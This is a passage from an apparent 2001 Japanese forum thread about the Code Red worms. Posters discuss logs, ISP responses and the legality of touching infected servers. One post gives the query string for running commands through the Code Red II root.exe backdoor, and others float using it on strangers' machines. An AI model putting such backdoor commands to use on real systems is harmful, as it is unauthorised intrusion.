巨大な赤丸、Code Red Iのものと思われる。局所的感染を繰り返す IIの
分布は、正確な情報はないのかも。
- 507 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:23
- http://www.ae.wakwak.com/~sysportcore/sysport/kb/security/coderedworm.htm
から引用
> seculity.nlのデータから、CodeRed IIについてだけ
> アタック数の自己相関係数を計算してみました。
> 24時間の周期性があります。これは同じサイトが、
> 24時間ごとにリブートし再感染しているためだと思います。
> ということは、9月30日までこんな調子で続くということですね。
- 508 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:25
- >>505 さんきゅ。
> もし,これからの数週間にインターネット接続が遅く
> なるようことがあったら,誰のせいにすればいいのだろう?
> 中国人のせいにもできるし,Microsoftのせいにもできる。
> あるいは,米国政府のせいにすることもできる。けれども
> 恐らくは,いまだにパッチをあてていないIISサーバの管理者
> を責めるのが,いちばん適当だろう。
激しく同意。
- 509 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:37
- >>508
でも感染者の相当数はアプリを入れた時に、一緒にIISを
突っ込まれたことに気づいていないユーザだろうからね。
もう管理者云々という問題じゃなくなってる。MSのポリ
シーが最大の問題じゃないのかな
- 510 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:37
- 中国からを 装った 毛唐がやったに一票
そのほうが自然だ
- 511 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:43
- 直接関係無いけど、こんなん出てました。
http://www.asahi.com/national/update/0809/016.html
バックドア使う奴もマジで逝ってよしになるでしょう・・・
- 512 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:47
- >>509
うんうん。その通りだと思う。
しかしどんなプログラムもある程度以上の規模
になると「絶対安全」ってのは無いことは明らかだし、
だからといって「多機能危険より小機能安全を選べ」と
いうのを一般に浸透させるのはムリと思うっす。
Windows Update をもっと進化させて、クリティカルな
バグは自動更新とかするしかないのかな?
でもそうすると、その機能を使って悪戯する奴が絶対
出てくるし...
- 513 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:52
- >>511
> 電子メールの内容を「通信の秘密」にあたると判断
ナイス警視庁。
- 514 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:53
- 大学の学生でも簡単にサーバ立ち上げてそれこそマルチメディア時代といって
やってる時代に管理者を責めてもはじまらんぞ。なんの解決にもならん。それほど
インターネットが一般化したって事。幼稚園児に政治の話をしても理解できないのと同じ。
やはり仕組みを変えるしかないだろう。
- 515 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:57
- >>504 亀レスすんません。
eeye.comに出てる逆アセで、月の比較後にjnb short命令があり、NOPでつぶす
のが正解だった。time_tの4バイト比較ではなく2バイトだ。鬱。
これ以上は厨房に利用されるのでよしときます。
- 516 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:58
- >>513 エロ画像ハアハア
- 517 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:06
- >>511
IDパスワードの必要が無い完全公開状態のバックドアにこの判例がそのまま当てはまるか?
マナーとしてはアクセスする事が良い事だとは思いません。
- 518 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:10
- 自分トコのサーバ、今アクセス認証にした。
そうしたらアクセスログの xxxxxx〜が消えて
211.***.***.***- - [09/Aug/2001:15:51:23 +0900] "GET /default.ida HTTP/1.0" 401 313
みたいになってスッキリ見やすくなった。
- 519 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:10
- >>517
あてはまらんしょ。
- 520 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:10
- >>511
うーん、推定されるようなやわなパスを使うやつも逝ってよしだと思う…。
- 521 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:11
- >>517
法的な定義「通信」ではないので、「通信の秘密」にはなりませんが、
もともと、不正アクセス防止法に引っかかるのでは。
見えることと、見せることは違いがあり、バックドアは運用管理者が公開
する意思が明らかにないものですし。鍵が掛かってなかったら入った、
では、言い訳は。
- 522 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:19
- >>521
きいてもいないのに「うちの鍵はあきっぱなしですよー」っていい続けている家なんだけどね。
- 523 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:19
- 鍵がかかってないドアから入るなら問題なし。
だけどこの場合は壁に大穴ぶち開けられてるような状態だからダメ。
- 524 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:22
- 鍵開いてるから、入ってもいいかな。
誰も居ないから盗んでもいいかな。
誰もが最初から犯罪者ってわけじゃなく、だんだんと感覚が狂って
いくのかもね。
- 525 :521:2001/08/09(木) 16:23
- >>522, >>523
というわけで、法律とはまったく理不尽なものです。はい。
- 526 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:23
- また今日中に新スレの予感・・・
- 527 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:24
- XXXは61ばっかり(ひとつ65がいた)あまりにも多いので
逆引きする気力が・・・
Excelか何かに適当に整形したログぶち込んだらISP名が自動的にでる
マクロってない?
- 528 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:24
- >>523
阪神大震災の時ならOK
- 529 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:24
- タイトル考えるの大変だね〜
- 530 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:25
- >>527
言い出しっぺの法則。
- 531 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:25
- 人数の問題を除いて考えると、罹患サーバの管理者を不正アクセス防止法で
検挙できないの?
無罪になるためには、自身が被害者であることを立証しないと駄目って事で。
- 532 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:25
- >>529
って言うか、昨日900糞だ人は
ヒサンだったよ〜(w
- 533 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:26
- >>524
じゃ どうやって Web見るんだ?
- 534 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:26
- >>528
それでもダメ。
とゆーか不正アクセス禁止法の条文読め。
- 535 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:26
- ここの警告ページいい感じ 既出だったら素満
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html
- 536 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:26
- >>531
最悪、警告しても放置したまま応じなければ、損害賠償の対象にはなるように思われ。
- 537 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:27
- >>535
残念ながら既出です。
- 538 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:28
- >>534
だって、本当にワームなの?
実はバックドア仕掛けたくて成りすましてる奴もいるかもよ?
立証責任はワームらしきアクセスを行ってる管理者にあるでしょう。
- 539 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:29
- >>534
OKわかった。相手が気づかなければいいんでしょ。
- 540 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:29
- ってことで、今度からjpドメインからXXXタイプのワームが来たら、
警察に告訴しよう。
- 541 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:34
- index.htmlおいてなくてさ、httpルート以下全部見えるサイトって結構あるよね?
サイト管理者は http-root/おいでやす.html からたどれるとこしか見せるつもりないと主張したとしよう。
その場合サイト管理者がみせたくないと「考えていた」ファイルみたら?
- 542 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:35
- 自宅にある週に1時間くらいしか使わない2000に入ってましたv(^-^
どんな経路で感染したんかな〜
- 543 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:36
- >>541
それは故意に一般公開してるとしたら
文句言えないな。
- 544 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:36
- バックドア叩くのは不正アクセス禁止法第三条第二項の2に引っかかる
ワーム撒くのは不正アクセス禁止法第三条第二項の3に引っかかる
ただワームみたいな本人の意思によらない自動処理の場合どう判断されるかは知らない。
>>541
「アクセス制御機能」が存在しないので問題なし。
パスワードかかってたらダメ。
- 545 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:36
- >>525
>というわけで、法律とはまったく理不尽なものです。はい。
それはそのとおり。
ただしその状態に甘んじているだけのやつは虫けら以下のカスです。はい。
- 546 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:38
- >>544
だろ、だからワームが本人の意思では無いっちゅう証拠を挙げる責任は
管理者にあるだろ。
>ワーム撒くのは不正アクセス禁止法第三条第二項の3に引っかかる
だいたい警告されているのに、なぁーーーんの対処もしていなかった
点で使用者責任は生じてるわけじゃん。
- 547 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:38
- >>542
そこら中から感染するから、わくわくするようなモンではない。
というか、駆除はお墨ですか?
- 548 :( ´Д`):2001/08/09(木) 16:38
- >>542
こういうの読むと自宅のWin2000が心配になってきた・・・
ルーターの設定が間違っていないことを祈る・・・
- 549 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:40
- >>548
今の状況だと、10分繋げるともれなく罹患します。
年為
- 550 :スレ違いゴメン:2001/08/09(木) 16:42
- >>544
ふむふむ。そうするとこないだの「サクセス顧客名簿流出事件」は
ダウンロードしたほうは不正アクセス防止法違反にならないのか。
あ、俺は終わった後知ったから取ってないよ(w
- 551 :525:2001/08/09(木) 16:43
- >>545
というわけで順法的に各所に対処してる漏れは逝ってきます。では・・・
- 552 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:44
- >>546
不正アクセス禁止法って親告罪だっけか?
そうだったら俺が間違ってる。
そうじゃなかったら捜査は警察の仕事だ。
使用者責任に関しては民事になると思う。
この場合は自分で調べないとダメだな。
- 553 :542:2001/08/09(木) 16:44
- >>547
ネットから切り離して駆除したあと放置中です
盆休みの間に再インストールします
- 554 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:45
- さっき○○○に電話した。
3日前からウチのドアガチャガチャやってたやつ。
支社に電話したら本社の鯖管から折り電。
「フィルターではじけないですか?」なんてボケたこといってた。
サーバ全部やられてどうしようもない状態らしい。
おまけに「これは実際にはどういった障害が出るウィルスですか?」とか聞いてきたよ。
思わず殺意を抱いた瞬間。
- 555 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:46
- >>552
被害届の間違いだったかなぁ。ごめんね。
検察に直接告訴状を持っていく手もあったけ?
- 556 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:48
- >>554
そこんとこから食い込んでコンサルタントになるよろし。
銭とれるでぇ。
- 557 :( ´Д`):2001/08/09(木) 16:48
- >>549
そうだよねぇ・・・
会社の鯖2台とも今日だけで200回ドアたたかれてるし・・・
ますます心配
- 558 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:50
- ふと思った。これが電話だったら大変だろうなあ。
- 559 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:50
- >>556
だから、co.jpドメインが晒されること少ないのかぁ。
変だと思ってた。
- 560 :554:2001/08/09(木) 16:50
- >>556
だねぇ〜(w
でも業界国内最大手だぜ、そこ。
たとえ支店だろうがOCNエコとか使ってるんじゃ...
- 561 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:51
- >>559
ワラタ
- 562 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:51
- >>560
噂のアレですか?
- 563 :名無しさん@お腹いっぱい。:2001/08/09(木) 16:55
- >>560
晒しちゃえ、晒しちゃえ。
- 564 :名無しさん@お腹いっぱい。:2001/08/09(木) 17:03
- >>558
リンリン鳴って健康を害したという訴訟が頻発して弁護士儲かるかと思われ。
- 565 :名無しさん@お腹いっぱい。:2001/08/09(木) 17:07
- >>564
一日400回以上だから、マジノイローゼになるよなあ。
しかも電話使えない状態になっちまうし。
- 566 :名無しさん@お腹いっぱい。:2001/08/09(木) 17:12
- かかってきた電話取った人間が突然デタラメな番号に
ひたすら電話かけまくる様子想像しちまったじゃねーか(w
- 567 :名無しさん@お腹いっぱい。:2001/08/09(木) 17:14
- >>564 携帯だともっとひどいかも? 何処もはやっぱり儲かるね
- 568 :名無しさん@お腹いっぱい。:2001/08/09(木) 17:14
- >>566
人間に感染するワームですか?(w
- 569 :名無しさん@お腹いっぱい。:2001/08/09(木) 17:16
- >>555
直告してもハイテク捜査は検察では無理。手足が無いから。
結局警察に逝けと言われるのがオチでしょう。
- 570 :名無しさん@お腹いっぱい。:2001/08/09(木) 17:18
- iModeのJavaとかLモード電話ならまるっきりありえない
話じゃないかもね。
- 571 :名無しさん@お腹いっぱい。:2001/08/09(木) 17:19
- >>568
夏風邪?とか思ったけど、ワームだからサナダムシとか
そういうものか。
- 572 :名無しさん@お腹いっぱい。:2001/08/09(木) 17:21
- >>571 ワラタ
- 573 :560:2001/08/09(木) 17:25
- >>563
晒しちゃったら向こうの担当者に晒したのが俺だってばれるのでやらない。
ちなみにOCNはサイトの表示更新したって言ってきたけど...
あれ目立つと思う人手ぇ〜挙げて!
- 574 :名無しさん@お腹いっぱい。:2001/08/09(木) 17:29
- >>560
じゃあ、君の話を又聞きした第三者(ぷ)が晒せばOKだ!
- 575 :名無しさん@お腹いっぱい。:2001/08/09(木) 17:31
- 560の友人登場きぼーん
- 576 :名無しさん@お腹いっぱい。:2001/08/09(木) 17:34
- >>573
もう指摘するのもうんざりだが、あれだとWin2KProのユーザーは気が付かないと思われ
- 577 :名無しさん@お腹いっぱい。:2001/08/09(木) 17:35
- >>573
トップページにあるので@NIFTYの100倍目立ってます! (鬱
- 578 :560:2001/08/09(木) 17:37
- じゃぁヒントだけ。
ゼネコン
○○○
IPはやめとくね。
でも、もう回線切ってあると思うよ。
- 579 :名無しさん@お腹いっぱい。:2001/08/09(木) 17:38
- >>573
まだ大手が自社内の問題に対処しきれていないのが原因だと思われ。
大体大規模ネットワークの処理が終わったら、一斉に表示されると
おもう。
- 580 :560:2001/08/09(木) 17:39
- >>577
トップページにあるだけで目立ってますか...(鬱
- 581 :名無しさん@お腹いっぱい。:2001/08/09(木) 17:40
- >>578
ゼネコンならちょいとだけ許す。ほ〜んととでもない会社のIPが
いっぱい有ったよ。
藍屋の白袴。
- 582 :名無しさん@お腹いっぱい。:2001/08/09(木) 17:41
- >>580
ていうか、MSのトップページ、素人には一瞬新製品の宣伝に見えるぞ(藁
- 583 :560:2001/08/09(木) 17:42
- >>581
いや、あんなとこでもこんな回線使ってんだ〜とか思った。
- 584 :名無しさん@お腹いっぱい。:2001/08/09(木) 17:59
- http://ueno.cool.ne.jp/zeiger/CodeRedProve.zip
こんなもんみつけた。
今更感はあるけどね。
- 585 :名無しさん@お腹いっぱい。:2001/08/09(木) 18:01
- >>584
なにこれ?
- 586 :名無しさん@お腹いっぱい。:2001/08/09(木) 18:04
- >>584
禁煙中らしいね。
- 587 :560:2001/08/09(木) 18:12
- >>582
いまMSのトップ見てきた。
たしかに、あれじゃ新製品の宣伝だよ > MS
>>585
あれですよ、あれ。
- 588 :名無しさん@お腹いっぱい。:2001/08/09(木) 18:13
- FireWallの内側から串通って来るCode Redは、ステルス串
通ってるのよね?
内側から外側への80塞いで、明示的に串使わないと外部に
アクセス出来ないようにしてるとこの内側からはこないよね?
- 589 :名無しさん@お腹いっぱい。:2001/08/09(木) 18:14
- >>585
攻撃受けた数をカウントしてくれるらしい(藁
ジョークソフトみたいな物かなぁ。
- 590 :名無しさん@お腹いっぱい。:2001/08/09(木) 18:15
- >>588
ステルス串か、ただのNATでしょう。
- 591 :590:2001/08/09(木) 18:17
- >>588
舌足らずでした。そのとおりです。
- 592 :名無しさん@お腹いっぱい。:2001/08/09(木) 18:33
- http://www.ocn.ad.jp/
さどまいんどだけっす
- 593 :588:2001/08/09(木) 18:34
- >>590
あ、そうかNATもありますね。忘れてた。Thx。
- 594 :560:2001/08/09(木) 18:36
- >>592
OCNのトップページは
http://www.ocn.ne.jp/
です。
- 595 :名無しさん@お腹いっぱい。:2001/08/09(木) 18:48
- >>592
つーか、あれじゃフツー見んぞ。
みんな人事だと思ってる。
- 596 :え〜ん:2001/08/09(木) 19:52
- お、普通に戻ってる。
こんなに下がってるのも珍しい。
- 597 :名無しさん@お腹いっぱい。:2001/08/09(木) 19:58
- う〜ん、一時はチャット状態だったからねぇ〜
- 598 :なー:2001/08/09(木) 20:09
- あげ。
- 599 :名無しさん ◆pkhEz2DE:2001/08/09(木) 20:13
- テスト
- 600 :名無しさん@お腹いっぱい。:2001/08/09(木) 20:31
- 600。
関係ないけどコミケあげ。
- 601 :名無しさん@お腹いっぱい。:2001/08/09(木) 20:33
- おー人事おー人事
- 602 :名無しさん@お腹いっぱい。:2001/08/09(木) 20:35
- >>581
紺屋の白袴
- 603 :なー:2001/08/09(木) 20:40
- この説明は初心者に判りやすくて吉。
http://www.npa.go.jp/hightech/notice/code_red2.gif
- 604 :なー:2001/08/09(木) 20:41
- >>600
ぐわー。明日からじゃん。まだなんもやってねーよ。
- 605 :名無しさん@お腹いっぱい。:2001/08/09(木) 20:49
- 俺はおしごとー
おつかい頼もう
- 606 :名無しさん@お腹いっぱい。:2001/08/09(木) 20:52
- >>578
あれ。そこって前スレかどっかで晒されてたよね?
大○○
- 607 :名無しさん@お腹いっぱい。:2001/08/09(木) 20:52
- >>600 ああ、祭りか…そうだ、祭りがあった…ぁー…
- 608 :名無しさん@お腹いっぱい。:2001/08/09(木) 20:54
- もう、CodeRed本とか出てるんだろうなぁ。きっと。
- 609 :名無しさん@お腹いっぱい。:2001/08/09(木) 20:56
- RoadLanner(BRL-01) なんだけど、CodeRed受けたら設定が狂った。
WAN側のDHCPと、NAT変換がOFFになっちゃうー。
- 610 :名無しさん@お腹いっぱい。:2001/08/09(木) 20:59
- なるほど、そうですか。
- 611 :なー:2001/08/09(木) 21:00
- >>535
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html
なるほど。まとまってて良いよ。次のスレの>>1に書く事を推奨。
- 612 :なー:2001/08/09(木) 21:01
- >>608
あ。そのネタいただき!(藁
- 613 :名無しさん@お腹いっぱい。:2001/08/09(木) 21:11
- ソフトメーカー勤務の友人より電話。
友人「お前の所の鯖のログ、くれ。」
ワシ「はぁ(゚д゚)?何に使うんだ?」
友人「営業。」
どうやら感染したIPは金になるらしい。
社員みんなでjpの鯖ipをかき集めてるんだとさ。あらあら。
とんだ赤玉景気ですな(藁
- 614 :名無しさん@お腹いっぱい。:2001/08/09(木) 21:26
- >>608
原稿を落とした言い分けにもいい鴨。
- 615 :ななし:2001/08/09(木) 21:29
- アルファーとDEVIL666っていうところとEOネットからやたら
61で始まるIPからポートスキャンが来るんだけどこれCode Red??
- 616 :511:2001/08/09(木) 21:33
- >>609
BRL-04F使ってるけど
きのう port80あけてる方のマシンが変になった
ルータにpingも通らなくなったよ。
ランボードかと思ったけど、もしかしたらルータだったのかも
- 617 :名無しさん@お腹いっぱい。:2001/08/09(木) 21:41
- アメリカから久しぶりにNNNが来た。
- 618 :名無しさん@お腹いっぱい。:2001/08/09(木) 21:50
- ZDNetの「Code Redはログからアシがつく」って記事
>原理的にはCode Red IIの攻撃を「黙らせる」こともできるだろう。
って部分、バックドア侵入を煽ってるとしか思えないよなぁ
- 619 :名無しさん@お腹いっぱい。:2001/08/09(木) 21:51
- 裏ツールサイトでcode-red便乗遠隔操作ツールがあった(藁
串対応なのでセキュリティーもばっちり(゚д゚)ウマー
コマンドプロンプトだけどね。
「dir」とか打つだけ。間抜けで良い。
- 620 :名無しさん@お腹いっぱい。:2001/08/09(木) 21:56
- >>618
匿串つかえばよかろう。でもログは残るなあ。
聞いた事も無い国の串を使えばログを取り寄せるのは無理だね(藁
- 621 :名無しさん@お腹いっぱい。:2001/08/09(木) 21:56
- >>619
URLきぼんぬ
- 622 :名無しさん@お腹いっぱい。:2001/08/09(木) 22:04
- >>621
ここじゃ言えねえ。有名な所だよ。
- 623 :名無しさん@お腹いっぱい。:2001/08/09(木) 22:07
- ここ厨房臭くなってるな
- 624 :名無しさん@お腹いっぱい。:2001/08/09(木) 22:09
- コラコラ、はしたない真似はお止め>>621
- 625 :名無しさん@お腹いっぱい。:2001/08/09(木) 22:09
- 夜になってきましたな(ぼそ
- 626 :名無しさん@お腹いっぱい。:2001/08/09(木) 22:12
- とりあえず、今日は新スレは建てずに済みそう。
- 627 :名無しさん@お腹いっぱい。:2001/08/09(木) 22:17
- >>618
これやね。確かに「バックドアから黙らせちゃえ」って感じだな。
http://www.zdnet.co.jp/broadband/0108/08/cr2.html
- 628 :名無しさん ◆4M3IK9Oo:2001/08/09(木) 22:19
- 静かになってきたね。この調子で今日は終われるかな。
- 629 :名無しさん@お腹いっぱい。:2001/08/09(木) 22:22
- >>627
運用管理なんかやったこともない人間の記事なので仕方も有るまいが
いいかげんにせ〜と言いたい・・・
- 630 :名無しさん@お腹いっぱい。:2001/08/09(木) 22:28
- http://biztech.nikkeibp.co.jp/wcs/show/leaf?CID=onair/biztech/prom/137249
やっとMSが重い腰を上げたようで・・。
・・で、コレは誰の問い合わせを対象としてるんでしょう?
サーバー管理者?
- 631 :名無しさん@お腹いっぱい。:2001/08/09(木) 22:34
- CordRedのログを某ISPに送ったら俺を発信者と勘違いして
警告メールくれやがった…。情けねぇ…。
- 632 :名無しさん@お腹いっぱい。:2001/08/09(木) 22:43
- >>631
そんなISPは晒してやれ
- 633 :名無しさん@お腹いっぱい。:2001/08/09(木) 22:43
- >>631 ・・・絶句。
- 634 :名無しさん@お腹いっぱい。:2001/08/09(木) 22:45
- 61.*.*.*で国内からのものは殆どODN。肝心のODNの反応は
http://www.odn.ne.jp/counter/codered.html
- 635 :名無しさん@お腹いっぱい。:2001/08/09(木) 22:46
- >>634
ユーザ間の問題であってISPは警告しかしないと。
だめだこりゃ。
- 636 :名無しさん@お腹いっぱい。:2001/08/09(木) 22:54
- >>634
ODN、確かにひどいね。 俺、月曜日にODNからのアクセスを
ログから取り出して送ったんだけど完全に無視されている模様。
ISP変えよかな。最近どこも定額だしな。
- 637 :名無しさん@お腹いっぱい。:2001/08/09(木) 22:59
- >>630
とりあえずコピペ
--
マイクロソフトは2001年8月8日、同社のWebサーバーソフト「Internet Information
Server/Services(IIS)」を狙ったワーム「Code Red」に関する専用の電話問い合わせ窓口
(0120-69-0196)を設置した。土日や休日も含めて24時間体制で問い合わせを受け付ける。
同社ではCode Redに関して、Webサイトで修正プログラムを配付している。この修正プログラム
の適用法などについて、電話によるユーザーの問い合わせに応じる。
Code Redは、IISを稼働しているWindows NT 4.0/2000マシンを対象としたワームで、感染した
サーバーはWebページが書き換えられるほか、他のサーバーへワームの感染を広げたり、DoS攻
撃を仕掛ける。また、ハッカーがサーバーにアクセスできる“裏口”を設ける変種なども登場してお
り、被害は依然として続いているという。(中田 敦)
■問い合わせ先
・マイクロソフト IISセキュリティ情報センター 電話0120-69-0196
- 638 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:03
- >>634
うちは211.***のODN多いよ。オレもODNだから仕方がないかも
しれないけど、衰える気配は全くなし。
ちゃんと対策してんのかなぁ?
- 639 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:05
- >>638
いいなあ。おれもODN入ろうかな(藁
- 640 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:12
- しかし疲れたな...お盆前だというのに
もっとも、もう打つ手なしって所なんであきらめモードですが....
個人ユーザーに対策徹底させるなんて絶対無理だわ
p.s.
バックドアを使ったIISジェノサイダーが発生してIIS絶滅
->収束なんてなったら無力感倍増だな
- 641 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:14
- >>634
KDDIの貸サーバーはFWでアタックパケット遮断してたよ
個人ユーザーとの差はなんだ!!
- 642 :え〜ん:2001/08/09(木) 23:19
- OCNもがんばって赤虫発信してる。
- 643 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:21
- >>641
どうやら、できる装置を持ってないような気がしてきた。
BSD系のPPPとかは、パケットフィルタをユーザ別設定にして、必要ならRADIUS
で集中管理できるけど、ISPの使ってるADSLやダイアルアップのコンセントレータ
には入ってないのかも・・。
- 644 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:21
- リムネットの勘定奉行から来たよ・・・・
- 645 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:23
- >>627
おいおい、不正アクセス幇助だろ、この記事(w
- 646 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:26
- >cmd.exeがroot.exeと名を変えコピーされる。
NTもIISも知らんから、↑が何を意味するのか解らんのよね。 はぁ
- 647 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:29
- command.comならわかりやすいんだろうか?
あるいはshと似てないけどsh
- 648 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:30
- DOS窓がのファイル名が変わるってことですか?
>646
- 649 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:30
- 中小のプロバは比較的対応いいよ。
少なくとも返信くるからね。
- 650 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:31
- 今回のことで端末やネットワークに割としょぼい名前つけてる奴が多いって分かった。
- 651 :え〜ん:2001/08/09(木) 23:33
- >>627
ちょっと詳しすぎだよね。
- 652 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:36
- >>647
いや、、root.exeの方が、、
sambaのSWATの様な、ブラウザで弄れる設定ツール?
- 653 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:36
- >>648
見た目はそうだけど、厳密には違う。
そいやWinってRUNDLL.EXEってもっと強力なシェルもあったな。
- 654 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:36
- 数名によるアタックでもプロバに報告した方が良いんでしょうか?
たかが数回のアタックで・・・とか思われると嫌なので迷ってるんですけど。
- 655 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:37
- >>653
ご面倒でなければ違いをご説明いただけませんか?
- 656 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:40
- >>652
ネタじゃないよね。
設定ツールどころか、あらゆる実行ファイルを弄べるの。
NTのコマンドラインって結構そろっているので実質的にフリーハンド
- 657 :パンツはもう脱いでるんだけど:2001/08/09(木) 23:40
- 今夜のおすすめバックドアあいてるエロサイトのIPまだぁー?
- 658 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:40
- dir したい場合は root.exe?dir なの?
出力返ってこないけど。
- 659 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:42
- root.exe?/c+dir
- 660 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:43
- これ、20日から挙動が変わるんですよね?
この頻度でDosアタックされたらマジ告訴も検討なんですけど。
- 661 :649:2001/08/09(木) 23:43
- >> 653
回数は関係ないと思われ。
俺は1回だろうが報告、
同じプロバイダー内からまた来たら
これ以降の報告が必要か先方に確認している。
- 662 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:43
- >>656
root.exeで調べてみたらMSが意図的に仕掛けたセキュリティホール
だったそうですねw
そんなん普通想像つかんわ。 てっきりADMIN用の管理ツールかと
- 663 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:44
- >>658-659
不正アクセスはタイーホされちゃうよ
- 664 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:45
- >>659 thanks_!!!
- 665 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:45
- 管理者への報告、お願い、苦情テンプレート共有しませんか?
国内、英語圏なら拙いながらもなんとか書けるのですが、一番腹立たしいシナ、チョンあたりはお手上げです。
- 666 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:45
- >>655
シェルって言葉がわからないと説明は難しいかも
よくDOS窓と勘違いされるコンソール画面はコンソールデバイスを使う
プログラムがあると自動的に開かれるもの。
シェルもまたプログラムの一つ
さらにDOSエミュレーターはまた別物
- 667 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:47
- フォーマットとか悪質な事抜きで、管理者に気づかせる術
ありませんか? echoとか
- 668 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:50
- >>667
一筆したためる
- 669 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:50
- >>662
それは偽情報だ
というか書いた人恥さらし
- 670 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:50
- net send * せんせーこの機械red codeにやられてまーす。
- 671 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:50
- >>667
>>276
- 672 :婦人警官ハアハア:2001/08/09(木) 23:51
- バックドアからdel root.exeしても
「不正アクセク働いてごくろーさん」なわけだよね?(藁
- 673 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:52
- >>668
したため方解らず
- 674 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:54
- まあ、root.exe消しても止まらないしね。
- 675 :え〜ん:2001/08/09(木) 23:54
- >>667
http://www.nefty.net/desktop/haritsuke/img-box/img20010808002632.gif
机にこれ張りましょう。
すぐわかる。
- 676 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:55
- >>674 一礼だってばさ。
- 677 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:55
- 11時になってからテレホの影響かアタック回数がかなり増えた。
- 678 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:55
- >>670
これを裏口使って送るのが、一番罪が軽くて効果がありそうだね。
- 679 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:55
- 今日はアクセスログが昨日より伸びない。
ワームもお休み中?
- 680 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:57
- 増えた人、減った人
IPの違いか!?
- 681 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:58
- >>675
これの使用条件は?
勝手にホムペでつかってもいいのかな
- 682 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:58
- >>678
なんで罪を犯してまで(w
- 683 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:59
- >>680
減ったと思ったらファイヤーウォールが無力化されてた。
どさくさにまぎれて・・・
- 684 :名無しさん@お腹いっぱい。:2001/08/09(木) 23:59
- 61.***だけどテレホで増えた。
さすがODN。
- 685 :え〜ん:2001/08/10(金) 00:00
- 恥かしいけど俺が作った。
勝手につかってちょ
- 686 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:01
- 「Code Red拡散の責任は“管理者の不注意”だけではない?」
http://www.zdnet.co.jp/news/0108/09/nai_virus.html
- 687 :え〜ん:2001/08/10(金) 00:02
- >>681
絵のセンスはないんでスマソ
